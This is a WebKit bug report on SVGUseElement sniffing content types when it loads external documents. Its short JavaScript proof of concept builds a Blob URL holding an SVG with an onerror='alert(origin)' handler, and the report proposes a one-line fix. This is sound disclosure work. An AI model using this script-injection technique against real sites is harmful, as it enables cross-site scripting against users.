Bug 249948 - SVGUseElement sniffs content type when loading external document
Summary: SVGUseElement sniffs content type when loading external document
Status: NEW
Alias: None
Product: WebKit
Classification: Unclassified
Component: SVG (show other bugs)
Version: WebKit Nightly Build
Hardware: Unspecified Unspecified
: P2 Normal
Assignee: Nobody
URL:
Keywords: BrowserCompat, InRadar
Depends on:
Blocks:
 
Reported: 2022-12-29 14:38 PST by Jun Kokatsu
Modified: 2023-01-04 16:35 PST (History)
4 users (show)

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Jun Kokatsu 2022-12-29 14:38:35 PST 
PoC:

```
const text = `<svg id="x" xmlns="http://www.w3.org/2000/svg"><image href="xyz" onerror="alert(origin)" /></svg>`;
const blob = new Blob([text], {type: 'application/octet-stream'}); // <- not "image/svg+xml"
const url = URL.createObjectURL(blob);
let attackerControlledString = url + "#x";
const svg=document.createElementNS("http://www.w3.org/2000/svg", "svg");
const use=document.createElementNS("http://www.w3.org/2000/svg", "use");
use.setAttribute('href', attackerControlledString);
svg.appendChild(use);
document.body.appendChild(svg);
```

The above code only loads external SVG from a Blob URL in Webkit. Both Blink and Gecko ignores it due to content type mismatch.

Potential fix is to add the following code after https://github.com/WebKit/WebKit/blob/5c3443a0ab7a7fdeaeeb20c104da59b55de0e265/Source/WebCore/svg/SVGUseElement.cpp#L614.

```
options.sniffContent = ContentSniffingPolicy::DoNotSniffContent;
```
Comment 1 Radar WebKit Bug Importer 2023-01-04 16:35:34 PST 
<rdar://problem/103893082>